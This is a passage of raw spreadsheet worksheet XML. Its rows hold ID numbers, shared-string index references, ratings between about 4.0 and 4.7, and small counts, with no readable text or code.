      <c r="I4343" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4343" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4343" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4343" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4343" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4343" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4343" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4343" s="12">
        <v>4.5</v>
      </c>
      <c r="Q4343" s="12">
        <v>4.5</v>
      </c>
      <c r="R4343" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4343" s="12" t="s">
        <v>27927</v>
      </c>
      <c r="T4343" s="12" t="s">
        <v>27928</v>
      </c>
      <c r="U4343" s="12" t="s">
        <v>27929</v>
      </c>
      <c r="V4343" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4343" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4343" s="12">
        <v>50</v>
      </c>
      <c r="Y4343" s="12" t="s">
        <v>27930</v>
      </c>
    </row>
    <row r="4344" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4344" s="12">
        <v>115771</v>
      </c>
      <c r="B4344" s="12" t="s">
        <v>30910</v>
      </c>
      <c r="D4344" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4344" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4344" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4344" s="12" t="s">
        <v>27931</v>
      </c>
      <c r="H4344" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4344" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4344" s="12" t="s">
        <v>26990</v>
      </c>
      <c r="K4344" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4344" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4344" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4344" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4344" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4344" s="12" t="s">
        <v>27932</v>
      </c>
      <c r="Q4344" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="R4344" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4344" s="12" t="s">
        <v>27933</v>
      </c>
      <c r="T4344" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U4344" s="12" t="s">
        <v>27934</v>
      </c>
      <c r="V4344" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4344" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4344" s="12">
        <v>119</v>
      </c>
      <c r="Y4344" s="12" t="s">
        <v>27935</v>
      </c>
    </row>
    <row r="4345" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4345" s="12">
        <v>116071</v>
      </c>
      <c r="B4345" s="12" t="s">
        <v>31345</v>
      </c>
      <c r="D4345" s="12" t="s">
        <v>31547</v>
      </c>
      <c r="F4345" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4345" s="12" t="s">
        <v>27942</v>
      </c>
      <c r="H4345" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4345" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4345" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="K4345" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4345" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4345" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4345" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4345" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4345" s="12" t="s">
        <v>27943</v>
      </c>
      <c r="Q4345" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4345" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4345" s="12" t="s">
        <v>27944</v>
      </c>
      <c r="T4345" s="12" t="s">
        <v>27945</v>
      </c>
      <c r="U4345" s="12" t="s">
        <v>27946</v>
      </c>
      <c r="V4345" s="12" t="s">
        <v>27734</v>
      </c>
      <c r="W4345" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4345" s="12">
        <v>5</v>
      </c>
      <c r="Y4345" s="12" t="s">
        <v>27947</v>
      </c>
    </row>
    <row r="4346" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4346" s="12">
        <v>116091</v>
      </c>
      <c r="B4346" s="12" t="s">
        <v>29943</v>
      </c>
      <c r="D4346" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4346" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4346" s="12" t="s">
        <v>27948</v>
      </c>
      <c r="H4346" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4346" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4346" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4346" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4346" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4346" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4346" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4346" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4346" s="12" t="s">
        <v>27949</v>
      </c>
      <c r="Q4346" s="12">
        <v>4.5</v>
      </c>
      <c r="R4346" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4346" s="12" t="s">
        <v>27950</v>
      </c>
      <c r="T4346" s="12" t="s">
        <v>27951</v>
      </c>
      <c r="U4346" s="12" t="s">
        <v>27952</v>
      </c>
      <c r="V4346" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4346" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4346" s="12">
        <v>10</v>
      </c>
      <c r="Y4346" s="12" t="s">
        <v>27953</v>
      </c>
    </row>
    <row r="4347" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4347" s="12">
        <v>116321</v>
      </c>
      <c r="B4347" s="12" t="s">
        <v>31182</v>
      </c>
      <c r="C4347" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4347" s="12" t="s">
        <v>31441</v>
      </c>
      <c r="F4347" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4347" s="12" t="s">
        <v>27954</v>
      </c>
      <c r="H4347" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4347" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4347" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4347" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4347" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4347" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4347" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4347" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4347" s="12" t="s">
        <v>27955</v>
      </c>
      <c r="Q4347" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="R4347" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4347" s="12" t="s">
        <v>27956</v>
      </c>
      <c r="T4347" s="12" t="s">
        <v>27939</v>
      </c>
      <c r="U4347" s="12" t="s">
        <v>27957</v>
      </c>
      <c r="V4347" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4347" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4347" s="12">
        <v>30</v>
      </c>
      <c r="Y4347" s="12" t="s">
        <v>27958</v>
      </c>
    </row>
    <row r="4348" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4348" s="12">
        <v>116791</v>
      </c>
      <c r="B4348" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4348" s="12" t="s">
        <v>30131</v>
      </c>
      <c r="D4348" s="12" t="s">
        <v>30130</v>
      </c>
      <c r="E4348" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F4348" s="12" t="s">
        <v>30132</v>
      </c>
      <c r="G4348" s="12" t="s">
        <v>27959</v>
      </c>
      <c r="H4348" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4348" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4348" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4348" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4348" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4348" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4348" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4348" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4348" s="12" t="s">
        <v>27960</v>
      </c>
      <c r="Q4348" s="12">
        <v>4.5</v>
      </c>
      <c r="R4348" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4348" s="12" t="s">
        <v>27961</v>
      </c>
      <c r="T4348" s="12" t="s">
        <v>27962</v>
      </c>
      <c r="U4348" s="12" t="s">
        <v>27963</v>
      </c>
      <c r="V4348" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4348" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4348" s="12">
        <v>21</v>
      </c>
      <c r="Y4348" s="12" t="s">
        <v>27964</v>
      </c>
    </row>
    <row r="4349" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4349" s="12">
        <v>116851</v>
      </c>
      <c r="B4349" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4349" s="12" t="s">
        <v>30780</v>
      </c>
      <c r="F4349" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4349" s="12" t="s">
        <v>27965</v>
      </c>
      <c r="H4349" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4349" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4349" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K4349" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4349" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4349" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4349" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4349" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4349" s="12" t="s">
        <v>27966</v>
      </c>
      <c r="Q4349" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4349" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4349" s="12" t="s">
        <v>27967</v>
      </c>
      <c r="T4349" s="12" t="s">
        <v>27968</v>
      </c>
      <c r="U4349" s="12" t="s">
        <v>27969</v>
      </c>
      <c r="V4349" s="12" t="s">
        <v>5175</v>
      </c>
      <c r="W4349" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4349" s="12">
        <v>23</v>
      </c>
      <c r="Y4349" s="12" t="s">
        <v>27970</v>
      </c>
    </row>
    <row r="4350" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4350" s="12">
        <v>116941</v>
      </c>
      <c r="B4350" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4350" s="12" t="s">
        <v>30238</v>
      </c>
      <c r="D4350" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4350" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F4350" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G4350" s="12" t="s">
        <v>27971</v>
      </c>
      <c r="H4350" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4350" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4350" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4350" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4350" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4350" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4350" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4350" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4350" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="Q4350" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="R4350" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4350" s="12" t="s">
        <v>27972</v>
      </c>
      <c r="T4350" s="12" t="s">
        <v>27973</v>
      </c>
      <c r="U4350" s="12" t="s">
        <v>27974</v>
      </c>
      <c r="V4350" s="12" t="s">
        <v>27975</v>
      </c>
      <c r="W4350" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4350" s="12">
        <v>41</v>
      </c>
      <c r="Y4350" s="12" t="s">
        <v>27976</v>
      </c>
    </row>
    <row r="4351" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4351" s="12">
        <v>117011</v>
      </c>
      <c r="B4351" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4351" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4351" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F4351" s="12" t="s">
        <v>30239</v>
      </c>
      <c r="G4351" s="12" t="s">
        <v>27977</v>
      </c>
      <c r="H4351" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4351" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4351" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4351" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4351" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4351" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4351" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4351" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4351" s="12" t="s">
        <v>27978</v>
      </c>
      <c r="Q4351" s="12">
        <v>4.7</v>
      </c>
      <c r="R4351" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4351" s="12" t="s">
        <v>27979</v>
      </c>
      <c r="T4351" s="12" t="s">
        <v>14269</v>
      </c>
      <c r="U4351" s="12" t="s">
        <v>27980</v>
      </c>
      <c r="V4351" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W4351" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4351" s="12">
        <v>10</v>
      </c>
      <c r="Y4351" s="12" t="s">
        <v>27981</v>
      </c>
    </row>
    <row r="4352" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4352" s="12">
        <v>117391</v>
      </c>
      <c r="B4352" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4352" s="12" t="s">
        <v>31328</v>
      </c>
      <c r="D4352" s="12" t="s">
        <v>31365</v>
      </c>
      <c r="F4352" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4352" s="12" t="s">
        <v>27982</v>
      </c>
      <c r="H4352" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4352" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4352" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4352" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4352" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4352" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4352" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4352" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4352" s="12" t="s">
        <v>27983</v>
      </c>
      <c r="Q4352" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4352" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4352" s="12" t="s">
        <v>27984</v>
      </c>
      <c r="T4352" s="12" t="s">
        <v>27985</v>
      </c>
      <c r="U4352" s="12" t="s">
        <v>27986</v>
      </c>
      <c r="V4352" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4352" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4352" s="12">
        <v>11</v>
      </c>
      <c r="Y4352" s="12" t="s">
        <v>27987</v>
      </c>
    </row>
    <row r="4353" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4353" s="12">
        <v>117651</v>
      </c>
      <c r="B4353" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4353" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4353" s="12" t="s">
        <v>31512</v>
      </c>
      <c r="F4353" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4353" s="12" t="s">
        <v>27992</v>
      </c>
      <c r="H4353" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4353" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4353" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K4353" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4353" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4353" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4353" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4353" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4353" s="12" t="s">
        <v>27993</v>
      </c>
      <c r="Q4353" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4353" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4353" s="12" t="s">
        <v>27994</v>
      </c>
      <c r="T4353" s="12" t="s">
        <v>27995</v>
      </c>
      <c r="U4353" s="12" t="s">
        <v>27996</v>
      </c>
      <c r="V4353" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W4353" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4353" s="12">
        <v>13</v>
      </c>
      <c r="Y4353" s="12" t="s">
        <v>27997</v>
      </c>
    </row>
    <row r="4354" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4354" s="12">
        <v>118201</v>
      </c>
      <c r="B4354" s="12" t="s">
        <v>31325</v>
      </c>
      <c r="C4354" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4354" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4354" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4354" s="12" t="s">
        <v>27998</v>
      </c>
      <c r="H4354" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4354" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4354" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4354" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4354" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4354" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4354" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4354" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4354" s="12" t="s">
        <v>27999</v>
      </c>
      <c r="Q4354" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4354" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4354" s="12" t="s">
        <v>28000</v>
      </c>
      <c r="T4354" s="12" t="s">
        <v>28001</v>
      </c>
      <c r="U4354" s="12" t="s">
        <v>28002</v>
      </c>
      <c r="V4354" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4354" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4354" s="12">
        <v>13</v>
      </c>
      <c r="Y4354" s="12" t="s">
        <v>28003</v>
      </c>
    </row>
    <row r="4355" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4355" s="12">
        <v>118381</v>
      </c>
      <c r="B4355" s="12" t="s">
        <v>31345</v>
      </c>
      <c r="D4355" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4355" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4355" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4355" s="12" t="s">
        <v>28004</v>
      </c>
      <c r="H4355" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4355" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4355" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4355" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4355" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4355" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4355" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4355" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4355" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="Q4355" s="12">
        <v>4.5999999999999996</v>
      </c>
      <c r="R4355" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4355" s="12" t="s">
        <v>28005</v>
      </c>
      <c r="T4355" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="U4355" s="12" t="s">
        <v>28006</v>
      </c>
      <c r="V4355" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4355" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4355" s="12">
        <v>17</v>
      </c>
      <c r="Y4355" s="12" t="s">
        <v>28007</v>
      </c>
    </row>
    <row r="4356" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4356" s="12">
        <v>118421</v>
      </c>
      <c r="B4356" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4356" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4356" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4356" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4356" s="12" t="s">
        <v>28008</v>
      </c>
      <c r="H4356" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4356" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4356" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4356" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4356" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4356" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4356" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4356" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4356" s="12" t="s">
        <v>28009</v>
      </c>
      <c r="Q4356" s="12">
        <v>4.7</v>
      </c>
      <c r="R4356" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4356" s="12" t="s">
        <v>28010</v>
      </c>
      <c r="T4356" s="12" t="s">
        <v>27939</v>
      </c>
      <c r="U4356" s="12" t="s">
        <v>28011</v>
      </c>
      <c r="V4356" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4356" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4356" s="12">
        <v>4</v>
      </c>
      <c r="Y4356" s="12" t="s">
        <v>28012</v>
      </c>
    </row>
    <row r="4357" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4357" s="12">
        <v>119151</v>
      </c>
      <c r="B4357" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4357" s="12" t="s">
        <v>29944</v>
      </c>
      <c r="D4357" s="12" t="s">
        <v>29945</v>
      </c>
      <c r="E4357" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4357" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4357" s="12" t="s">
        <v>28013</v>
      </c>
      <c r="H4357" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4357" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4357" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4357" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4357" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4357" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4357" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4357" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4357" s="12" t="s">
        <v>28014</v>
      </c>
      <c r="Q4357" s="12">
        <v>4.7</v>
      </c>
      <c r="R4357" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4357" s="12" t="s">
        <v>28015</v>
      </c>
      <c r="T4357" s="12" t="s">
        <v>25979</v>
      </c>
      <c r="U4357" s="12" t="s">
        <v>28016</v>
      </c>
      <c r="V4357" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4357" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4357" s="12">
        <v>13</v>
      </c>
      <c r="Y4357" s="12" t="s">
        <v>28017</v>
      </c>
    </row>
    <row r="4358" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4358" s="12">
        <v>119261</v>
      </c>
      <c r="B4358" s="12" t="s">
        <v>31184</v>
      </c>
      <c r="D4358" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4358" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4358" s="12" t="s">
        <v>31183</v>
      </c>
      <c r="G4358" s="12" t="s">
        <v>28018</v>
      </c>
      <c r="H4358" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4358" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4358" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4358" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4358" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4358" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4358" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4358" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4358" s="12" t="s">
        <v>28019</v>
      </c>
      <c r="Q4358" s="12">
        <v>4.7</v>
      </c>
      <c r="R4358" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4358" s="12" t="s">
        <v>28020</v>
      </c>
      <c r="T4358" s="12" t="s">
        <v>27323</v>
      </c>
      <c r="U4358" s="12" t="s">
        <v>28021</v>
      </c>
      <c r="V4358" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4358" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4358" s="12">
        <v>11</v>
      </c>
      <c r="Y4358" s="12" t="s">
        <v>28022</v>
      </c>
    </row>
    <row r="4359" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4359" s="12">
        <v>119621</v>
      </c>
      <c r="B4359" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4359" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4359" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4359" s="12" t="s">
        <v>31185</v>
      </c>
      <c r="G4359" s="12" t="s">
        <v>28023</v>
      </c>
      <c r="H4359" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4359" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4359" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4359" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4359" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4359" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4359" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4359" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4359" s="12" t="s">
        <v>28024</v>
      </c>
      <c r="Q4359" s="12">
        <v>4.5</v>
      </c>
      <c r="R4359" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4359" s="12" t="s">
        <v>28025</v>
      </c>
      <c r="T4359" s="12" t="s">
        <v>28026</v>
      </c>
      <c r="U4359" s="12" t="s">
        <v>28027</v>
      </c>
      <c r="V4359" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4359" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4359" s="12">
        <v>4</v>
      </c>
      <c r="Y4359" s="12" t="s">
        <v>28028</v>
      </c>
    </row>
    <row r="4360" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4360" s="12">
        <v>119801</v>
      </c>
      <c r="B4360" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4360" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4360" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4360" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4360" s="12" t="s">
        <v>28034</v>
      </c>
      <c r="H4360" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4360" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4360" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K4360" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4360" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4360" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4360" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4360" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4360" s="12" t="s">
        <v>28035</v>
      </c>
      <c r="Q4360" s="12">
        <v>4.7</v>
      </c>
      <c r="R4360" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4360" s="12" t="s">
        <v>28036</v>
      </c>
      <c r="T4360" s="12" t="s">
        <v>14269</v>
      </c>
      <c r="U4360" s="12" t="s">
        <v>28037</v>
      </c>
      <c r="V4360" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W4360" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4360" s="12">
        <v>5</v>
      </c>
      <c r="Y4360" s="12" t="s">
        <v>28038</v>
      </c>
    </row>
    <row r="4361" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4361" s="12">
        <v>119961</v>
      </c>
      <c r="B4361" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4361" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4361" s="12" t="s">
        <v>30392</v>
      </c>
      <c r="G4361" s="12" t="s">
        <v>28040</v>
      </c>
      <c r="H4361" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4361" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4361" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4361" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4361" s="12" t="s">
